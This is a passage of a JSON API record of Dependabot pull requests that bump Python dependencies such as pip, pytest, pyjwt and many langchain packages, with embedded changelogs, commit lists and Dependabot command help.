href=\"https://github.com/jpadilla/pyjwt/commit/40e3147eb5f790d8d041772e5fc00728a176c812\"\u003e\u003ccode\u003e40e3147\u003c/code\u003e\u003c/a\u003e Migrate development extras to dependency groups (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1152\"\u003e#1152\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `pip` from 26.1 to 26.1.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pypa/pip/blob/main/NEWS.rst\"\u003epip's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e26.1.2 (2026-05-31)\u003c/h1\u003e\n\u003ch2\u003eBug Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eReject \u003ccode\u003econsole_scripts\u003c/code\u003e and \u003ccode\u003egui_scripts\u003c/code\u003e entry points whose name would\ninstall a script outside the scripts directory. (\u003ccode\u003e[#14000](https://github.com/pypa/pip/issues/14000) \u0026lt;https://github.com/pypa/pip/issues/14000\u0026gt;\u003c/code\u003e_)\u003c/li\u003e\n\u003cli\u003eFix installation incorrectly failing when the target path contains a doubled\nslash, such as with \u003ccode\u003epip install --root //...\u003c/code\u003e. (\u003ccode\u003e[#14001](https://github.com/pypa/pip/issues/14001) \u0026lt;https://github.com/pypa/pip/issues/14001\u0026gt;\u003c/code\u003e_)\u003c/li\u003e\n\u003cli\u003eSend a consistent \u003ccode\u003eAccept-Encoding\u003c/code\u003e header to avoid a spurious \u003ccode\u003eCache entry deserialization failed\u003c/code\u003e warning. (\u003ccode\u003e[#14012](https://github.com/pypa/pip/issues/14012) \u0026lt;https://github.com/pypa/pip/issues/14012\u0026gt;\u003c/code\u003e_)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e26.1.1 (2026-05-04)\u003c/h1\u003e\n\u003ch2\u003eBug Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix issue where uninstallation left behind empty directories. Revert the\nremoval of the adjacent \u003ccode\u003e__pycache__\u003c/code\u003e directory when a .py file is removed. (\u003ccode\u003e[#13973](https://github.com/pypa/pip/issues/13973) \u0026lt;https://github.com/pypa/pip/issues/13973\u0026gt;\u003c/code\u003e_)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/pip/commit/31d7d168953668aad85154d6121879d07fbeac27\"\u003e\u003ccode\u003e31d7d16\u003c/code\u003e\u003c/a\u003e Bump for release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/pip/commit/79f348c86a149adec5a9852788dcc13114b29d3c\"\u003e\u003ccode\u003e79f348c\u003c/code\u003e\u003c/a\u003e Update AUTHORS.txt\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/pip/commit/237a9258813636b7b1ead05e2cb0d509b44f67ee\"\u003e\u003ccode\u003e237a925\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pypa/pip/issues/14001\"\u003e#14001\u003c/a\u003e from notatallshaw/fix-is-within-directory\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/pip/commit/34d0285d548bbd644bfabfede2dfabed23c240db\"\u003e\u003ccode\u003e34d0285\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pypa/pip/issues/14006\"\u003e#14006\u003c/a\u003e from laymonage/fix-requirements_from_scripts-space-...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/pip/commit/09d3e07066c56e20b4ab2b3133e29f02f19be5e9\"\u003e\u003ccode\u003e09d3e07\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pypa/pip/issues/14012\"\u003e#14012\u003c/a\u003e from notatallshaw/stable-accept-encoding\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/pip/commit/fa7854f6b37113a2c4698cdde902e1fcc9bebdd5\"\u003e\u003ccode\u003efa7854f\u003c/code\u003e\u003c/a\u003e Use is_within_directory for entry point check\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/pip/commit/d01b46c273e08bf4299feb81899c9bd0b3e7029b\"\u003e\u003ccode\u003ed01b46c\u003c/code\u003e\u003c/a\u003e NEWS ENTRY\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/pip/commit/7ff8bdd81ec5edca2bebf78ad8506dda710d6af5\"\u003e\u003ccode\u003e7ff8bdd\u003c/code\u003e\u003c/a\u003e Fix is_within_directory for doubled-slash roots\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/pip/commit/7ea3466fb51ccc729e67ea85809df5a4dda1987b\"\u003e\u003ccode\u003e7ea3466\u003c/code\u003e\u003c/a\u003e NEWS ENTRY\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/pip/commit/85673eaa109f343658f9904f4045ff009378ae08\"\u003e\u003ccode\u003e85673ea\u003c/code\u003e\u003c/a\u003e Fix Accept-Encoding to gzip, deflate\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pypa/pip/compare/26.1...26.1.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `pytest` from 9.0.3 to 9.1.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pytest-dev/pytest/releases\"\u003epytest's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e9.1.0\u003c/h2\u003e\n\u003ch1\u003epytest 9.1.0 (2026-06-13)\u003c/h1\u003e\n\u003ch2\u003eRemovals and backward incompatible breaking changes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/pytest-dev/pytest/issues/14533\"\u003e#14533\u003c/a\u003e: When using \u003ccode\u003e--doctest-modules\u003c/code\u003e, autouse fixtures with \u003ccode\u003emodule\u003c/code\u003e, \u003ccode\u003epackage\u003c/code\u003e or \u003ccode\u003esession\u003c/code\u003e scope that are defined inline in Python test modules (not plugins or conftests) will now possibly execute twice.\u003c/p\u003e\n\u003cp\u003eIf this is undesirable, move the fixture definition to a \u003ccode\u003econftest.py\u003c/code\u003e file if possible.\u003c/p\u003e\n\u003cp\u003eTechnical explanation for those interested:\nWhen using \u003c!-- raw HTML omitted --\u003e--doctest-modules\u003c!-- raw HTML omitted --\u003e, pytest possibly collects Python modules twice, once as \u003ccode\u003epytest.Module\u003c/code\u003e and once as a \u003ccode\u003eDoctestModule\u003c/code\u003e (depending on the configuration).\nDue to improvements in pytest's fixture implementation, if e.g. the \u003ccode\u003eDoctestModule\u003c/code\u003e collects a fixture, it is now visible to it only, and not to the \u003ccode\u003eModule\u003c/code\u003e.\nThis means that both need to register the fixtures independently.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eDeprecations (removal in next major release)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/pytest-dev/pytest/issues/10819\"\u003e#10819\u003c/a\u003e: Added a deprecation warning for class-scoped fixtures defined as instance methods (without \u003ccode\u003e@classmethod\u003c/code\u003e). Such fixtures set attributes on a different instance than the test methods use, leading to unexpected behavior. Use \u003ccode\u003e@classmethod\u003c/code\u003e decorator instead -- by \u003ccode\u003eyastcher\u003c/code\u003e.\u003c/p\u003e\n\u003cp\u003eSee \u003ccode\u003e10819\u003c/code\u003e and \u003ccode\u003e14011\u003c/code\u003e.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/pytest-dev/pytest/issues/12882\"\u003e#12882\u003c/a\u003e: Calling \u003ccode\u003erequest.getfixturevalue() \u0026lt;pytest.FixtureRequest.getfixturevalue\u0026gt;\u003c/code\u003e during teardown to request a fixture that was not already requested is now deprecated and will become an error in pytest 10.\u003c/p\u003e\n\u003cp\u003eSee \u003ccode\u003edynamic-fixture-request-during-teardown\u003c/code\u003e for details.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/pytest-dev/pytest/issues/13409\"\u003e#13409\u003c/a\u003e: Using non-\u003ccode\u003e~collections.abc.Collection\u003c/code\u003e iterables (such as generators, iterators, or custom iterable objects) for the \u003ccode\u003eargvalues\u003c/code\u003e parameter in \u003ccode\u003e@pytest.mark.parametrize \u0026lt;pytest.mark.parametrize ref\u0026gt;\u003c/code\u003e and \u003ccode\u003emetafunc.parametrize \u0026lt;pytest.Metafunc.parametrize\u0026gt;\u003c/code\u003e is now deprecated.\u003c/p\u003e\n\u003cp\u003eThese iterables get exhausted after the first iteration,\nleading to tests getting unexpectedly skipped in cases such as running \u003ccode\u003epytest.main()\u003c/code\u003e multiple times,\nusing class-level parametrize decorators,\nor collecting tests multiple times.\u003c/p\u003e\n\u003cp\u003eSee \u003ccode\u003eparametrize-iterators\u003c/code\u003e for details and suggestions.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/pytest-dev/pytest/issues/13946\"\u003e#13946\u003c/a\u003e: The private \u003ccode\u003econfig.inicfg\u003c/code\u003e attribute is now deprecated.\nUse \u003ccode\u003econfig.getini() \u0026lt;pytest.Config.getini\u0026gt;\u003c/code\u003e to access configuration values instead.\u003c/p\u003e\n\u003cp\u003eSee \u003ccode\u003econfig-inicfg\u003c/code\u003e for more details.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/pytest-dev/pytest/issues/14004\"\u003e#14004\u003c/a\u003e: Passing \u003ccode\u003ebaseid\u003c/code\u003e to \u003ccode\u003e~pytest.FixtureDef\u003c/code\u003e or \u003ccode\u003enodeid\u003c/code\u003e strings to fixture registration APIs is now deprecated. These are internal pytest APIs that are used by some plugins.\u003c/p\u003e\n\u003cp\u003eUse the \u003ccode\u003enode\u003c/code\u003e parameter instead for fixture scoping. This enables more robust node-based\nmatching instead of string prefix matching.\nIf you've used \u003ccode\u003enodeid=None\u003c/code\u003e, pass \u003ccode\u003enode=session\u003c/code\u003e instead.\u003c/p\u003e\n\u003cp\u003eThis will be removed in pytest 10.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/pytest-dev/pytest/issues/14335\"\u003e#14335\u003c/a\u003e: The method of configuring hooks using markers, deprecated since pytest 7.2, is now scheduled to be removed in pytest 10.\nSee \u003ccode\u003ehook-markers\u003c/code\u003e for more details.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/pytest-dev/pytest/issues/14434\"\u003e#14434\u003c/a\u003e: The \u003ccode\u003e--pastebin\u003c/code\u003e option is now deprecated.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/pytest/commit/b2522cf0b11fb33ecc1f4895fa1dffbb9252a63d\"\u003e\u003ccode\u003eb2522cf\u003c/code\u003e\u003c/a\u003e Prepare release version 9.1.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/pytest/commit/368d2fca78e86ac79ec269bb078fcb1259a94fed\"\u003e\u003ccode\u003e368d2fc\u003c/code\u003e\u003c/a\u003e [refactor] Tighten \u003ccode\u003eSetComparisonFunction\u003c/code\u003e to \u003ccode\u003eIterator[str]\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/pytest-dev/pytest/issues/14587\"\u003e#14587\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/pytest/commit/ff77cd8b66b43a88c26ca54384bbcab72d079497\"\u003e\u003ccode\u003eff77cd8\u003c/code\u003e\u003c/a\u003e [refactor] Make base assertion comparisons return an iterator instead of a li...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/pytest/commit/0d8491a4ecf971800de0479ef55c7f5292c54937\"\u003e\u003ccode\u003e0d8491a\u003c/code\u003e\u003c/a\u003e build(deps): Bump actions/stale from 10.2.0 to 10.3.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/pytest/commit/4a809d9c892f6abb5ba92b77b06f1dd878f4660a\"\u003e\u003ccode\u003e4a809d9\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/pytest/issues/14568\"\u003e#14568\u003c/a\u003e from pytest-dev/register-fixture\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/pytest/commit/5dfa38541becfb77d0f52cac4cc8cce71849ab61\"\u003e\u003ccode\u003e5dfa385\u003c/code\u003e\u003c/a\u003e Fix recursion traceback test to cover all styles (\u003ca href=\"https://redirect.github.com/pytest-dev/pytest/issues/14582\"\u003e#14582\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/pytest/commit/f52ff0c1778c15038cf2bbb00b7668dac674cc26\"\u003e\u003ccode\u003ef52ff0c\u003c/code\u003e\u003c/a\u003e Add \u003ccode\u003epytest.register_fixture\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/pytest/commit/a8ac094e80df788aec844794170b126eab0be7a4\"\u003e\u003ccode\u003ea8ac094\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/pytest/issues/14567\"\u003e#14567\u003c/a\u003e from pytest-dev/more-visibility-deprecate\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/pytest/commit/e5620cd21ec62f5a5f9a5141a3c76fb3953729b6\"\u003e\u003ccode\u003ee5620cd\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/pytest-dev/pytest/issues/14577\"\u003e#14577\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/pytest/commit/2ce9c6d94eb691ea4da7f91f330602cbb67a6daf\"\u003e\u003ccode\u003e2ce9c6d\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/pytest/issues/14540\"\u003e#14540\u003c/a\u003e from minbang930/fix-14533-doctest-module-fixtures\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pytest-dev/pytest/compare/9.0.3...9.1.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore \u003cdependency name\u003e major version` will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e minor version` will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e` will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)\n- `@dependabot unignore \u003cdependency name\u003e` will remove all of the ignore conditions of the specified dependency\n- `@dependabot unignore \u003cdependency name\u003e \u003cignore condition\u003e` will remove the ignore condition of the specified dependency and ignore conditions\n\n\n\u003c/details\u003e","html_url":"https://github.com/pycontribs/jira/pull/2434","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/pycontribs%2Fjira/issues/2434","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/2434/packages"}},{"old_version":"2.12.1","new_version":"2.13.0","update_type":"minor","path":"/libs/cli","pr_created_at":"2026-06-14T18:23:41.000Z","version_change":"2.12.1 → 2.13.0","issue":{"uuid":"4660143493","node_id":"PR_kwDORoD75c7mSWXu","number":130,"state":"closed","title":"chore(deps): bump the minor-and-patch group in /libs/cli with 36 updates","user":"dependabot[bot]","labels":["dependencies","python:uv"],"assignees":[],"locked":false,"comments_count":2,"pull_request":true,"closed_at":"2026-06-14T18:28:21.000Z","author_association":null,"state_reason":null,"created_at":"2026-06-14T18:23:41.000Z","updated_at":"2026-06-14T18:28:23.000Z","time_to_close":280,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): bump","group_name":"minor-and-patch","update_count":36,"packages":[{"name":"langchain","old_version":"1.3.1","new_version":"1.3.9","repository_url":"https://github.com/langchain-ai/langchain"},{"name":"langgraph","old_version":"1.2.0","new_version":"1.2.5","repository_url":"https://github.com/langchain-ai/langgraph"},{"name":"langgraph-sdk","old_version":"0.3.14","new_version":"0.4.2","repository_url":"https://github.com/langchain-ai/langgraph"},{"name":"langchain-openai","old_version":"1.2.1","new_version":"1.3.2","repository_url":"https://github.com/langchain-ai/langchain"},{"name":"langsmith","old_version":"0.8.5","new_version":"0.8.15","repository_url":"https://github.com/langchain-ai/langsmith-sdk"},{"name":"textual","old_version":"8.2.6","new_version":"8.2.7","repository_url":"https://github.com/Textualize/textual"},{"name":"uuid-utils","old_version":"0.15.0","new_version":"0.16.0","repository_url":"https://github.com/aminalaee/uuid-utils"},{"name":"langchain-mcp-adapters","old_version":"0.2.2","new_version":"0.3.0","repository_url":"https://github.com/langchain-ai/langchain-mcp-adapters"},{"name":"pyjwt","old_version":"2.12.1","new_version":"2.13.0","repository_url":"https://github.com/jpadilla/pyjwt"},{"name":"python-multipart","old_version":"0.0.29","new_version":"0.0.32","repository_url":"https://github.com/Kludex/python-multipart"},{"name":"langchain-anthropic","old_version":"1.4.3","new_version":"1.4.6","repository_url":"https://github.com/langchain-ai/langchain"},{"name":"langchain-aws","old_version":"1.4.7","new_version":"1.5.1","repository_url":"https://github.com/langchain-ai/langchain-aws"},{"name":"langchain-cohere","old_version":"0.5.1","new_version":"0.6.0","repository_url":"https://github.com/langchain-ai/langchain-cohere"},{"name":"langchain-deepseek","old_version":"1.0.1","new_version":"1.1.0","repository_url":"https://github.com/langchain-ai/langchain"},{"name":"langchain-google-genai","old_version":"4.2.2","new_version":"4.2.5","repository_url":"https://github.com/langchain-ai/langchain-google"},{"name":"langchain-groq","old_version":"1.1.2","new_version":"1.1.3","repository_url":"https://github.com/langchain-ai/langchain"},{"name":"langchain-ibm","old_version":"1.0.10","new_version":"1.1.0","repository_url":"https://github.com/langchain-ai/langchain-ibm"},{"name":"langchain-litellm","old_version":"0.6.5","new_version":"0.6.6","repository_url":"https://github.com/langchain-ai/langchain-litellm"},{"name":"langchain-mistralai","old_version":"1.1.4","new_version":"1.1.5","repository_url":"https://github.com/langchain-ai/langchain"},{"name":"langchain-nvidia-ai-endpoints","old_version":"1.3.0","new_version":"1.4.1","repository_url":"https://github.com/langchain-ai/langchain-nvidia"},{"name":"langchain-perplexity","old_version":"1.2.0","new_version":"1.4.0","repository_url":"https://github.com/langchain-ai/langchain"},{"name":"langchain-google-vertexai","old_version":"3.2.3","new_version":"3.2.4","repository_url":"https://github.com/langchain-ai/langchain-google"},{"name":"daytona","old_version":"0.176.0","new_version":"0.187.0"},{"name":"modal","old_version":"1.4.2","new_version":"1.5.0","repository_url":"https://github.com/modal-labs/modal-client"},{"name":"runloop-api-client","old_version":"1.21.0","new_version":"1.23.2","repository_url":"https://github.com/runloopai/api-client-python"},{"name":"tavily-python","old_version":"0.7.24","new_version":"0.7.26","repository_url":"https://github.com/tavily-ai/tavily-python"},{"name":"ruff","old_version":"0.15.13","new_version":"0.15.17","repository_url":"https://github.com/astral-sh/ruff"},{"name":"ty","old_version":"0.0.37","new_version":"0.0.49","repository_url":"https://github.com/astral-sh/ty"},{"name":"pytest","old_version":"9.0.3","new_version":"9.1.0","repository_url":"https://github.com/pytest-dev/pytest"},{"name":"pytest-asyncio","old_version":"1.3.0","new_version":"1.4.0","repository_url":"https://github.com/pytest-dev/pytest-asyncio"},{"name":"pytest-socket","old_version":"0.7.0","new_version":"0.8.0","repository_url":"https://github.com/miketheman/pytest-socket"},{"name":"responses","old_version":"0.26.0","new_version":"0.26.1","repository_url":"https://github.com/getsentry/responses"},{"name":"langchain-core","old_version":"1.4.0","new_version":"1.4.7","repository_url":"https://github.com/langchain-ai/langchain"},{"name":"starlette","old_version":"1.2.1","new_version":"1.3.1","repository_url":"https://github.com/Kludex/starlette"},{"name":"uvicorn","old_version":"0.47.0","new_version":"0.49.0","repository_url":"https://github.com/Kludex/uvicorn"},{"name":"agent-client-protocol","old_version":"0.10.0","new_version":"0.10.1","repository_url":"https://github.com/agentclientprotocol/python-sdk"}],"path":"/libs/cli","ecosystem":"pip"},"body":"Bumps the minor-and-patch group in /libs/cli with 36 updates:\n\n| Package | From | To |\n| --- | --- | --- |\n| [langchain](https://github.com/langchain-ai/langchain) | `1.3.1` | `1.3.9` |\n| [langgraph](https://github.com/langchain-ai/langgraph) | `1.2.0` | `1.2.5` |\n| [langgraph-sdk](https://github.com/langchain-ai/langgraph) | `0.3.14` | `0.4.2` |\n| [langchain-openai](https://github.com/langchain-ai/langchain) | `1.2.1` | `1.3.2` |\n| [langsmith](https://github.com/langchain-ai/langsmith-sdk) | `0.8.5` | `0.8.15` |\n| [textual](https://github.com/Textualize/textual) | `8.2.6` | `8.2.7` |\n| [uuid-utils](https://github.com/aminalaee/uuid-utils) | `0.15.0` | `0.16.0` |\n| [langchain-mcp-adapters](https://github.com/langchain-ai/langchain-mcp-adapters) | `0.2.2` | `0.3.0` |\n| [pyjwt](https://github.com/jpadilla/pyjwt) | `2.12.1` | `2.13.0` |\n| [python-multipart](https://github.com/Kludex/python-multipart) | `0.0.29` | `0.0.32` |\n| [langchain-anthropic](https://github.com/langchain-ai/langchain) | `1.4.3` | `1.4.6` |\n| [langchain-aws](https://github.com/langchain-ai/langchain-aws) | `1.4.7` | `1.5.1` |\n| [langchain-cohere](https://github.com/langchain-ai/langchain-cohere) | `0.5.1` | `0.6.0` |\n| [langchain-deepseek](https://github.com/langchain-ai/langchain) | `1.0.1` | `1.1.0` |\n| [langchain-google-genai](https://github.com/langchain-ai/langchain-google) | `4.2.2` | `4.2.5` |\n| [langchain-groq](https://github.com/langchain-ai/langchain) | `1.1.2` | `1.1.3` |\n| [langchain-ibm](https://github.com/langchain-ai/langchain-ibm) | `1.0.10` | `1.1.0` |\n| [langchain-litellm](https://github.com/langchain-ai/langchain-litellm) | `0.6.5` | `0.6.6` |\n| [langchain-mistralai](https://github.com/langchain-ai/langchain) | `1.1.4` | `1.1.5` |\n| [langchain-nvidia-ai-endpoints](https://github.com/langchain-ai/langchain-nvidia) | `1.3.0` | `1.4.1` |\n| [langchain-perplexity](https://github.com/langchain-ai/langchain) | `1.2.0` | `1.4.0` |\n| [langchain-google-vertexai](https://github.com/langchain-ai/langchain-google) | `3.2.3` | `3.2.4` |\n| daytona | `0.176.0` | `0.187.0` |\n| [modal](https://github.com/modal-labs/modal-client) | `1.4.2` | `1.5.0` |\n| [runloop-api-client](https://github.com/runloopai/api-client-python) | `1.21.0` | `1.23.2` |\n| [tavily-python](https://github.com/tavily-ai/tavily-python) | `0.7.24` | `0.7.26` |\n| [ruff](https://github.com/astral-sh/ruff) | `0.15.13` | `0.15.17` |\n| [ty](https://github.com/astral-sh/ty) | `0.0.37` | `0.0.49` |\n| [pytest](https://github.com/pytest-dev/pytest) | `9.0.3` | `9.1.0` |\n| [pytest-asyncio](https://github.com/pytest-dev/pytest-asyncio) | `1.3.0` | `1.4.0` |\n| [pytest-socket](https://github.com/miketheman/pytest-socket) | `0.7.0` | `0.8.0` |\n| [responses](https://github.com/getsentry/responses) | `0.26.0` | `0.26.1` |\n| [langchain-core](https://github.com/langchain-ai/langchain) | `1.4.0` | `1.4.7` |\n| [starlette](https://github.com/Kludex/starlette) | `1.2.1` | `1.3.1` |\n| [uvicorn](https://github.com/Kludex/uvicorn) | `0.47.0` | `0.49.0` |\n| [agent-client-protocol](https://github.com/agentclientprotocol/python-sdk) | `0.10.0` | `0.10.1` |\n\nUpdates `langchain` from 1.3.1 to 1.3.9\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/langchain-ai/langchain/releases\"\u003elangchain's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003elangchain==1.3.9\u003c/h2\u003e\n\u003cp\u003eChanges since langchain==1.3.8\u003c/p\u003e\n\u003cp\u003erelease(anthropic): 1.4.6 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38105\"\u003e#38105\u003c/a\u003e)\nrelease(langchain): 1.3.9 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38104\"\u003e#38104\u003c/a\u003e)\nfix(langchain,anthropic): confine file-search results and tighten anthropic \u003ccode\u003eallowed_prefixes\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38106\"\u003e#38106\u003c/a\u003e)\u003c/p\u003e\n\u003ch2\u003elangchain==1.3.8\u003c/h2\u003e\n\u003cp\u003eChanges since langchain==1.3.7\u003c/p\u003e\n\u003cp\u003erelease(langchain): 1.3.8 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38096\"\u003e#38096\u003c/a\u003e)\nstyle(core,langchain,langchain-classic,partners): replace double backticks in docstrings (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38095\"\u003e#38095\u003c/a\u003e)\nrelease(core): 1.4.6 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38061\"\u003e#38061\u003c/a\u003e)\nchore(langchain): add overloads to \u003ccode\u003ecreate_agent\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/34309\"\u003e#34309\u003c/a\u003e)\nchore(infra): bump mypy to 2.1 and unify type-check config across the monorepo (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/36470\"\u003e#36470\u003c/a\u003e)\nfix(langchain): support async middleware decorator typing (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/34584\"\u003e#34584\u003c/a\u003e)\nfix(langchain): tighten structured output model fallbacks (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38042\"\u003e#38042\u003c/a\u003e)\nrelease(anthropic): 1.4.5 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38036\"\u003e#38036\u003c/a\u003e)\nhotfix(core): bump lockfile(s) (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38032\"\u003e#38032\u003c/a\u003e)\nrefactor(langchain): refactor \u003ccode\u003etest_create_agent_tool_validation\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/34443\"\u003e#34443\u003c/a\u003e)\u003c/p\u003e\n\u003ch2\u003elangchain==1.3.7\u003c/h2\u003e\n\u003cp\u003eChanges since langchain==1.3.6\u003c/p\u003e\n\u003cp\u003erelease(langchain): 1.3.7 (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38024\"\u003e#38024\u003c/a\u003e)\nstyle(langchain): add ruff rules ARG (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/34435\"\u003e#34435\u003c/a\u003e)\nfeat(langchain): add \u003ccode\u003eProviderToolSearchMiddleware\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/37969\"\u003e#37969\u003c/a\u003e)\nchore(langchain): activate mypy \u003ccode\u003ewarn_return_any\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/34249\"\u003e#34249\u003c/a\u003e)\ntest(langchain): mark legacy trigger view for 2.0 removal (\u003ca href=\"https://redirect.github.com/langchain-ai/langchain/issues/38002\"\u003e#38002\u003c/a\u003e)\u003c/p\u003e\n\u003ch2\u003elangchain==1.3.6\u003c/h2\u003e\n\u003cp\u003eChanges since langchain==1.3.5\u003c/p\u003e\n\u003cp\u003erelease(langchain): 1.3.6 